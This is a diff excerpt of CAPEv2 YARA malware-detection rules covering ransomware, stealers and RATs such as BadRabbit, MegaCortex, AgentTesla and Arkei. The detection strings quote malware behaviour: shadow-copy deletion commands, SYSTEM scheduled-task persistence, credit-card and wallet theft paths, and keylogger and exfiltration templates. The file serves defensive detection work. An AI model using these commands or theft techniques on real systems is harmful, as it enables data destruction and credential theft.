FF} + $session7_64_2 = {D5 FD D7 FF} + $session8_32_2 = {D5 FD DB FF} + $session8_64_2 = {D5 FD C7 FF} + $ipc = "IPC$" + $pipe1 = "atsvc" + $pipe2 = "browser" + $pipe3 = "eventlog" + $pipe4 = "lsarpc" + $pipe5 = "netlogon" + $pipe6 = "ntsvcs" + $pipe7 = "spoolss" + $pipe8 = "samr" + $pipe9 = "srvsvc" + $pipe10 = "scerpc" + $pipe11 = "svcctl" + $pipe12 = "wkssvc" condition: - uint16(0)==0x5A4D and ( all of ($a*)) + uint16(0)==0x5A4D and ( all of ($SMB*)) and $ipc and ( any of ($session*)) and ( any of ($pipe*)) } -rule CAPE_Sparkrat +rule CAPE_Zerot : FILE { meta: - description = "SparkRAT Payload" - author = "t-mtsmt" - id = "6b30b2d5-5b32-5347-832d-814b43eab945" - date = "2024-08-04" - modified = "2024-08-04" + description = "ZeroT Payload" + author = "kevoreilly" + id = "dc5dc18c-2ec6-541d-905c-42543f17b16d" + date = "2019-10-30" + modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/SparkRAT.yar#L1-L49" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "96d9cc4411c01fec33aa8be19c06395ff07726a5e2b9c968674e0cadecf10caf" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/ZeroT.yar#L1-L15" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "f60ae25ac3cd741b8bdc5100b5d3c474b5d9fbe8be88bfd184994bae106c3803" score = 75 quality = 68 - tags = "" - cape_type = "SparkRAT Payload" + tags = "FILE" + cape_type = "ZeroT Payload" strings: - $path_00 = "/client/common" - $path_01 = "/client/config" - $path_02 = "/client/core" - $path_03 = "/client/service/basic" - $path_04 = "/client/service/desktop" - $path_05 = "/client/service/file" - $path_06 = "/client/service/process" - $path_07 = "/client/service/terminal" - $path_08 = "/modules" - $path_09 = "/utils" - $cmd_00 = "PING" - $cmd_01 = "OFFLINE" - $cmd_02 = "LOCK" - $cmd_03 = "LOGOFF" - $cmd_04 = "HIBERNATE" - $cmd_05 = "SUSPEND" - $cmd_06 = "RESTART" - $cmd_07 = "SHUTDOWN" - $cmd_08 = "SCREENSHOT" - $cmd_09 = "TERMINAL_INIT" - $cmd_10 = "TERMINAL_INPUT" - $cmd_11 = "TERMINAL_RESIZE" - $cmd_12 = "TERMINAL_PING" - $cmd_13 = "TERMINAL_KILL" - $cmd_14 = "FILES_LIST" - $cmd_15 = "FILES_FETCH" - $cmd_16 = "FILES_REMOVE" - $cmd_17 = "FILES_UPLOAD" - $cmd_18 = "FILE_UPLOAD_TEXT" - $cmd_19 = "PROCESSES_LIST" - $cmd_20 = "PROCESS_KILL" - $cmd_21 = "DESKTOP_INIT" - $cmd_22 = "DESKTOP_PING" - $cmd_23 = "DESKTOP_KILL" - $cmd_24 = "DESKTOP_SHOT" - $cmd_25 = "COMMAND_EXEC" + $decrypt = {8B C1 8D B5 FC FE FF FF 33 D2 03 F1 F7 75 10 88 0C 33 41 8A 04 3A 88 06 81 F9 00 01 00 00 7C E0} + $string1 = "(*^GF(9042&*" + $string2 = "s2-18rg1-41g3j_.;" + $string3 = "GET" wide + $string4 = "open" condition: - 3 of ($path_*) and 3 of ($cmd_*) + uint16(0)==0x5A4D and all of them } -rule CAPE_Megacortex : FILE +rule CAPE_Badrabbit : FILE { meta: - description = "MegaCortex Payload" + description = "BadRabbit Payload" author = "kevoreilly" - id = "ea3dd937-2cb1-5b0f-98b8-154aacaf8650" + id = "c7204772-6f14-57b7-88c1-e9156f9897d5" date = "2019-10-30" modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/MegaCortex.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "5de1d8241260070241c91b97f18feb2a90069e3b158e863e2d9f568799c244e6" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/BadRabbit.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "309e14ab4ea2f919358631f9d8b2aaff1f51e7708b6114e4e6bf4a9d9a5fc86c" score = 75 quality = 70 tags = "FILE" - cape_type = "MegaCortex Payload" + cape_type = "BadRabbit Payload" strings: - $str1 = ".megac0rtx" ascii wide - $str2 = "vssadmin delete shadows /all" ascii - $sha256 = {98 2F 8A 42 91 44 37 71 CF FB C0 B5 A5 DB B5 E9} + $a1 = "caforssztxqzf2nm.onion" wide + $a2 = "schtasks /Create /SC once /TN drogon /RU SYSTEM" wide + $a3 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal" wide condition: - uint16(0)==0x5A4D and all of them + uint16(0)==0x5A4D and ( all of ($a*)) } -rule CAPE_Nanolocker : FILE +rule CAPE_Atlas : FILE { meta: - description = "NanoLocker Payload" + description = "Atlas Payload" author = "kevoreilly" - id = "6fff6a27-a153-5461-9a75-2253c2f7d408" + id = "22322e5c-ded6-56df-8a39-a8f5cbc18239" date = "2019-10-30" modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/NanoLocker.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "fe6c8a4e259c3c526f8f50771251f6762b2b92a4df2e8bfc705f282489f757db" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Atlas.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "c3f73b29df5caf804dbfe3e6ac07a9e2c772bd2a126f0487e4a65e72bd501e6e" score = 75 quality = 70 tags = "FILE" - cape_type = "NanoLocker Payload" + cape_type = "Atlas Payload" strings: - $a1 = "NanoLocker" - $a2 = "$humanDeadline" - $a3 = "Decryptor.lnk" + $a1 = "bye.bat" + $a2 = "task=knock&id=%s&ver=%s x%s&disks=%s&other=%s&ip=%s&pub=" + $a3 = "process call create \"cmd /c start vssadmin delete shadows /all /q" condition: uint16(0)==0x5A4D and ( all of ($a*)) } -rule CAPE_Agent_Tesla +rule CAPE_Megacortex : FILE { meta: - description = "Detecting HTML strings used by Agent Tesla malware" - author = "Stormshield" - id = "5383994b-357d-539b-89b1-53be238f759d" - date = "2024-03-22" - modified = "2024-03-22" + description = "MegaCortex Payload" + author = "kevoreilly" + id = "ea3dd937-2cb1-5b0f-98b8-154aacaf8650" + date = "2019-10-30" + modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/AgentTesla.yar#L1-L17" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "3945754129dcc58e0abfd7485f5ff0c0afdd1078ae2cf164ca8f59a6f79db1be" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/MegaCortex.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "5de1d8241260070241c91b97f18feb2a90069e3b158e863e2d9f568799c244e6" score = 75 quality = 70 - tags = "" - version = "1.0" + tags = "FILE" + cape_type = "MegaCortex Payload" strings: - $html_username = "
UserName      : " wide ascii - $html_pc_name = "
PC Name       : " wide ascii - $html_os_name = "
OS Full Name  : " wide ascii - $html_os_platform = "
OS Platform   : " wide ascii - $html_clipboard = "
[clipboard]" wide ascii + $str1 = ".megac0rtx" ascii wide + $str2 = "vssadmin delete shadows /all" ascii + $sha256 = {98 2F 8A 42 91 44 37 71 CF FB C0 B5 A5 DB B5 E9} condition: - 3 of them + uint16(0)==0x5A4D and all of them } -rule CAPE_Agenttesla : FILE +rule CAPE_Arkei : FILE { meta: - description = "AgentTesla Payload" + description = "Arkei Payload" author = "kevoreilly" - id = "f7b930f1-cecb-5d80-809b-9503f282247a" - date = "2024-03-22" - modified = "2024-03-22" + id = "22ebe194-19a9-5bf2-9cfc-ea27b7724572" + date = "2020-02-11" + modified = "2020-02-11" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/AgentTesla.yar#L19-L41" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "1bf9b26c4cf87e674ddffabe40aba5a45499c6a04d4ff3e43c3cda4cbcb4d188" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Arkei.yar#L1-L24" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "03980827db1c53d4090ab196ba820ca34b5d83dc7140b11ead9182cb5d28c7d3" score = 75 quality = 70 tags = "FILE" - cape_type = "AgentTesla Payload" + cape_type = "Arkei Payload" strings: - $string1 = "smtp" wide - $string2 = "appdata" wide - $string3 = "76487-337-8429955-22614" wide - $string4 = "yyyy-MM-dd HH:mm:ss" wide - $string6 = "webpanel" wide - $string7 = "
UserName      :" wide - $string8 = "
IP Address  :" wide - $agt1 = "IELibrary.dll" ascii - $agt2 = "C:\\Users\\Admin\\Desktop\\IELibrary\\IELibrary\\obj\\Debug\\IELibrary.pdb" ascii - $agt3 = "GetSavedPasswords" ascii - $agt4 = "GetSavedCookies" ascii + $string1 = "Windows_Antimalware_Host_System_Worker" + $string2 = "Arkei" + $string3 = "Bitcoin\\wallet.dat" + $string4 = "Ethereum\\keystore" + $v1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii wide + $v2 = "/c taskkill /im " fullword ascii + $v3 = "card_number_encrypted FROM credit_cards" ascii + $v4 = "\\wallet.dat" ascii + $v5 = "Arkei/" wide + $v6 = "files\\passwords." ascii wide + $v7 = "files\\cc_" ascii wide + $v8 = "files\\autofill_" ascii wide + $v9 = "files\\cookies_" ascii wide condition: - uint16(0)==0x5A4D and ( all of ($string*) or 3 of ($agt*)) + uint16(0)==0x5A4D and ( all of ($string*) or 7 of ($v*)) } -rule CAPE_Agentteslav2 : FILE +import "pe" + +rule CAPE_Nighthawk { meta: - description = "AgenetTesla Type 2 Keylogger payload" - author = "ditekshen" - id = "e60ecee4-0a97-56a1-b21e-47190f8cd1f8" - date = "2024-03-22" - modified = "2024-03-22" + description = "NightHawk C2" + author = "Nikhil Ashok Hegde <@ka1do9>" + id = "096b9d13-6aa7-5b6e-aaeb-e25aa7c8c53f" + date = "2022-12-05" + modified = "2022-12-05" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/AgentTesla.yar#L43-L67" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "b45296b3b94fa1ff32de48c94329a17402461fb6696e9390565c4dba9738ed78" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Nighthawk.yar#L3-L24" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "2d77912678e06503ffef0e8ed84aa4f9ac74357480d57742fbae619acebfb5f2" score = 75 quality = 70 - tags = "FILE" - cape_type = "AgentTesla Payload" + tags = "" + cape_type = "Nighthawk Payload" strings: - $s1 = "get_kbHook" ascii - $s2 = "GetPrivateProfileString" ascii - $s3 = "get_OSFullName" ascii - $s4 = "get_PasswordHash" ascii - $s5 = "remove_Key" ascii - $s6 = "FtpWebRequest" ascii - $s7 = "logins" fullword wide - $s8 = "keylog" fullword wide - $s9 = "1.85 (Hash, version 2, native byte-order)" wide - $cl1 = "Postbox" fullword ascii - $cl2 = "BlackHawk" fullword ascii - $cl3 = "WaterFox" fullword ascii - $cl4 = "CyberFox" fullword ascii - $cl5 = "IceDragon" fullword ascii - $cl6 = "Thunderbird" fullword ascii + $keying_methods = { 85 C9 74 43 83 E9 01 74 1C 83 F9 01 0F 85 } + $aes_sbox = { 63 7C 77 7B F2 6B 6F C5 30 } + $aes_inv_sbox = { 52 09 6A D5 30 36 A5 38 BF } condition: - ( uint16(0)==0x5a4d and 6 of ($s*)) or (6 of ($s*) and 2 of ($cl*)) + pe.is_pe and for any s in pe.sections : (s.name==".profile") and all of them } -rule CAPE_Agentteslav3 : FILE +rule CAPE_Sedreco : FILE { meta: - description = "AgentTeslaV3 infostealer payload" - author = "ditekshen" - id = "cfe00382-8663-54a4-a7c4-b932ec7ad5e3" - date = "2024-03-22" - modified = "2024-03-22" + description = "Sedreco encrypt function entry" + author = "kevoreilly" + id = "5b9ee4af-50a4-597c-8fa5-f2094c312d23" + date = "2022-06-09" + modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/AgentTesla.yar#L69-L111" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "26c4fa0ce8de6982eb599f3872e8ab2a6e83da4741db7f3500c94e0a8fe5d459" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Sedreco.yar#L1-L15" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "f735549606917f59a19157e604e54766e4456bc5d46e94cae3e0a3c18b52a7ca" score = 75 - quality = 68 + quality = 70 tags = "FILE" - cape_type = "AgentTesla payload" + cape_type = "Sedreco Payload" strings: - $s1 = "get_kbok" fullword ascii - $s2 = "get_CHoo" fullword ascii - $s3 = "set_passwordIsSet" fullword ascii - $s4 = "get_enableLog" fullword ascii - $s5 = "bot%telegramapi%" wide - $s6 = "KillTorProcess" fullword ascii - $s7 = "GetMozilla" ascii - $s8 = "torbrowser" wide - $s9 = "%chatid%" wide - $s10 = "logins" fullword wide - $s11 = "credential" fullword wide - $s12 = "AccountConfiguration+" wide - $s13 = ".+?)\\1[^>]*>" fullword wide - $s14 = "set_Lenght" fullword ascii - $s15 = "get_Keys" fullword ascii - $s16 = "set_AllowAutoRedirect" fullword ascii - $s17 = "set_wtqQe" fullword ascii - $s18 = "set_UseShellExecute" fullword ascii - $s19 = "set_IsBodyHtml" fullword ascii - $s20 = "set_FElvMn" fullword ascii - $s21 = "set_RedirectStandardOutput" fullword ascii - $g1 = "get_Clipboard" fullword ascii - $g2 = "get_Keyboard" fullword ascii - $g3 = "get_Password" fullword ascii - $g4 = "get_CtrlKeyDown" fullword ascii - $g5 = "get_ShiftKeyDown" fullword ascii - $g6 = "get_AltKeyDown" fullword ascii - $m1 = "yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.htmlLogtext/html[]Time" ascii - $m2 = "%image/jpg:Zone.Identifier\\tmpG.tmp%urlkey%-f \\Data\\Tor\\torrcp=%PostURL%127.0.0.1POST+%2B" ascii - $m3 = ">{CTRL}Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\\WScript.ShellRegReadg401" ascii - $m4 = "%startupfolder%\\%insfolder%\\%insname%/\\%insfolder%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run%insregname%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\RunTruehttp" ascii - $m5 = "\\WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera" ascii + $encrypt1 = {55 8B EC 83 EC 2C 53 56 8B F2 57 8B 7D 08 B8 AB AA AA AA} + $encrypt2 = {55 8B EC 83 EC 20 8B 4D 10 B8 AB AA AA AA} + $encrypt64_1 = {48 89 4C 24 08 53 55 56 57 41 54 41 56 48 83 EC 18 45 8D 34 10 48 8B E9 B8 AB AA AA AA 4D 8B E1 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA} condition: - ( uint16(0)==0x5a4d and (8 of ($s*) or (6 of ($s*) and 4 of ($g*)))) or (2 of ($m*)) + uint16(0)==0x5A4D and $encrypt1 or $encrypt2 or $encrypt64_1 } -rule CAPE_Agentteslaxor : FILE +rule CAPE_Squirrelwaffle : FILE { meta: - description = "AgentTesla xor-based config decoding" - author = "kevoreilly" - id = "81eeb62f-578f-5c75-bc96-091d5727a20a" - date = "2024-03-22" - modified = "2024-03-22" + description = "No description has been set in the source file - CAPE" + author = "kevoreilly & R3MRUM" + id = "0ae75f24-7a2a-57d3-8c6f-a61ac6cc08e7" + date = "2021-10-13" + modified = "2021-10-13" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/AgentTesla.yar#L113-L123" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "54581e83e5fa13fae4bda74016b3fa1d18c92e2659f493ebe54d70fd5f77bba5" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/SquirrelWaffle.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "5f799333398421d537ec7a87ca94f6cc9cf1e53e55b353036a5132440990e500" score = 75 - quality = 20 + quality = 70 tags = "FILE" - cape_type = "AgentTesla Payload" + cape_type = "SquirrelWaffle Payload" strings: - $decode = {06 91 06 61 20 [4] 61 D2 9C 06 17 58 0A 06 7E [4] 8E 69 FE 04 2D ?? 2A} + $code = {8D 45 ?? C6 45 ?? 00 0F 43 4D ?? 83 7D ?? 10 0F 43 45 ?? 8A 04 10 32 04 39 8D 4D ?? 0F B6 C0 50 6A 01 E8 [4] C6 45} + $decode = {F7 75 ?? 83 7D ?? 10 8D 4D ?? 8D 45 ?? C6 45 ?? 00 0F 43 4D ?? 83 7D ?? 10 0F 43 45 ?? 8A 04 10 32 04 39} condition: - uint16(0)==0x5A4D and any of them + uint16(0)==0x5A4D and all of them } -rule CAPE_Agentteslav4 : FILE +rule CAPE_Cerber : FILE { meta: - description = "AgentTesla Payload" + description = "Cerber Payload" author = "kevoreilly" - id = "a39109ca-84cb-527d-b9c2-d8763fa6e496" - date = "2024-03-22" - modified = "2024-03-22" + id = "edf08795-cf54-5822-8bc4-35cfba0fe8e8" + date = "2022-06-09" + modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/AgentTesla.yar#L125-L138" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "0a39036f408728ab312a54ff3354453d171424f57f9a8f3b42af867be3037ca9" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Cerber.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "16a8f808c28d3b142c079a305aba7f553f2452e439710bf610a06f8f2924d5a3" score = 75 quality = 70 tags = "FILE" - cape_type = "AgentTesla Payload" - packed = "7f8a95173e17256698324886bb138b7936b9e8c5b9ab8fffbfe01080f02f286c" + cape_type = "Cerber Payload" strings: - $decode1 = {(07|FE 0C 01 00) (07|FE 0C 01 00) 8E 69 (17|20 01 00 00 00) 63 8F ?? 00 00 01 25 47 (06|FE 0C 00 00) (1A|20 04 00 00 00) 58 4A D2 61 D2 52} - $decode2 = {(07|FE 0C 01 00) (08|FE 0C 02 00) 8F ?? 00 00 01 25 47 (07|FE 0C 01 00) (11 07|FE 0C 07 00) 91 (06|FE 0C 00 00) (1A|20 04 00 00 00) 58 4A 61 D2 61 D2 52} - $decode3 = {(07|FE 0C 01 00) (11 07|FE 0C 07 00) 8F ?? 00 00 01 25 47 (07|FE 0C 01 00) (08|FE 0C 02 00) 91 61 D2 52} + $code1 = {33 C0 66 89 45 8? 8D 7D 8? AB AB AB AB AB [0-2] 66 AB 8D 45 8? [0-3] E8 ?? ?? 00 00} condition: uint16(0)==0x5A4D and all of them } -rule CAPE_Agentteslav4Jit +rule CAPE_Zeuspanda : FILE { meta: - description = "AgentTesla JIT-compiled native code" + description = "ZeusPanda Payload" author = "kevoreilly" - id = "a87dca44-4974-543c-9565-487ed99be2a6" - date = "2024-03-22" - modified = "2024-03-22" + id = "7891c021-6687-5457-b9e1-0beb0472647c" + date = "2022-06-09" + modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/AgentTesla.yar#L140-L153" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "8f7144d2a989ce8d291af926b292f5f0f7772e707b0e49797eba13ecf91b90bc" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/ZeusPanda.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "43d8a56cae9fd23c053f6956851734d3270b46a906236854502c136e3bb1e761" score = 75 quality = 70 - tags = "" - cape_type = "AgentTesla Payload" - packed = "7f8a95173e17256698324886bb138b7936b9e8c5b9ab8fffbfe01080f02f286c" + tags = "FILE" + cape_type = "ZeusPanda Payload" strings: - $decode1 = {8B 01 8B 40 3C FF 50 10 8B C8 E8 [4] 89 45 CC B8 1A 00 00 00} - $decode2 = {83 F8 18 75 2? 8B [2-5] D1 F8} - $decode3 = {8D 4C 0? 08 0F B6 01 [0-3] 0F B6 5? 04 33 C2 88 01 B8 19 00 00 00} + $code1 = {8B 01 57 55 55 55 55 55 55 53 51 FF 50 0C 85 C0 78 E? 55 55 6A 03 6A 03 55 55 6A 0A FF 37} + $code2 = {8D 85 B0 FD FF FF 50 68 ?? ?? ?? ?? 8D 85 90 FA FF FF 68 0E 01 00 00 50 E8 ?? ?? ?? ?? 83 C4 10 83 F8 FF 7E ?? 68 04 01 00 00 8D 85 B0 FD FF FF} condition: - 2 of them + uint16(0)==0x5A4D and all of them } -rule CAPE_Nettraveler : FILE +rule CAPE_Pafish_1 : FILE { meta: - description = "NetTraveler Payload" + description = "Paranoid Fish Sandbox Detection" author = "kevoreilly" - id = "242e1c3f-5460-5393-9c07-cfab25860796" + id = "b9c1b909-1ef9-55f6-9250-1ccd8966543e" date = "2022-06-09" modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/NetTraveler.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "bf5026f1a1cb3d6986a29d22657a9f1904b362391a6715d7468f8f8aca351233" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Pafish.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "0a51bb2817e9fa5e599d0554de854ef62b128bcf5a22a69c33d56e16270f1c74" score = 75 quality = 70 tags = "FILE" - cape_type = "NetTraveler Payload" + cape_type = "Pafish Payload" strings: - $string1 = {4E 61 6D 65 3A 09 25 73 0D 0A 54 79 70 65 3A 09 25 73 0D 0A 53 65 72 76 65 72 3A 09 25 73 0D 0A} - $string2 = "Password Expiried Time:" - $string3 = "Memory: Total:%dMB,Left:%dMB (for %.2f%s)" + $rdtsc_vmexit = {8B 45 E8 80 F4 00 89 C3 8B 45 EC 80 F4 00 89 C6 89 F0 09 D8 85 C0 75 07} + $cape_string = "cape_options" condition: - uint16(0)==0x5A4D and all of them + uint16(0)==0x5A4D and $rdtsc_vmexit and not $cape_string } -rule CAPE_Bruteratel +rule CAPE_Blister_1 : FILE { meta: - description = "BruteRatel Payload" + description = "Blister Loader" author = "kevoreilly" - id = "61b951e4-0c27-59c0-8ea2-715b673fdcee" - date = "2024-07-11" - modified = "2024-07-11" + id = "525fc600-2afc-5cf6-bf55-4ce0ea264dca" + date = "2023-09-20" + modified = "2023-09-20" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/BruteRatel.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "0984977c716d6f8e068c045166eb5db77c9fbce27513e555dceca348375f1a66" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Blister.yar#L1-L17" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2" + hash = "d3eab2a134e7bd3f2e8767a6285b38d19cd3df421e8af336a7852b74f194802c" + logic_hash = "f26d85fdf0eb07e67fe38c43c5f6d024bfb7b2a333cb3411f5cdcff6bf5db12d" score = 75 quality = 70 - tags = "" - cape_type = "BruteRatel Payload" + tags = "FILE" + cape_type = "Blister Loader" strings: - $syscall1 = {49 89 CA 4? 89 ?? (41 FF|FF)} - $syscall2 = {49 89 CA 48 8B 44 24 ?? FF 64 24} - $jmpapi = {49 89 ?? 10 49 C7 45 08 ?? 00 00 00 E8 00 00 00 00 ?? (48|49) 83 [2] 41 FF E2} - $decode = {89 C2 8A 14 17 40 38 EA 75 06 FF C0 89 03 EB 0B 41 88 14 08 48 FF C1 FF 03 EB} + $protect1 = {50 6A 20 8D 45 ?? 50 8D 45 ?? 50 6A FF FF D7} + $protect2 = {48 83 C9 FF 48 8D 55 ?? FF D6 48 8D 87 [2] 00 00 48 8D 4D ?? FF D0} + $lock1 = {B9 FF FF FF 7F 89 75 FC 8B C1 F0 FF 45 FC 83 E8 01 75} + $lock2 = {B8 FF FF FF 7F 41 BC 01 00 00 00 89 45 40 F0 FF 4D 40 49 2B C4 75} + $decode = {0F BE C0 49 03 CC 41 33 C1 44 69 C8 [4] 41 8B C1 C1 E8 0F 44 33 C8 8A 01 84 C0 75 E1 41 81 F9 [4] 74} condition: - 2 of them + uint16(0)==0x5A4D and 2 of them } -rule CAPE_Dridexv4 : FILE +rule CAPE_Bazar : FILE { meta: - description = "Dridex v4 Payload" + description = "No description has been set in the source file - CAPE" author = "kevoreilly" - id = "c396f664-9f0d-50ac-bce8-33fd8712645a" - date = "2022-05-31" - modified = "2022-05-31" + id = "e042f180-2a82-5c93-9858-77281557dd10" + date = "2022-06-09" + modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/DridexV4.yar#L1-L15" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "cb103fe5f2d4792e3c612db4e2d84a4c8b0ce0f9a8443e9147e2c345f1dbdff6" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Bazar.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = 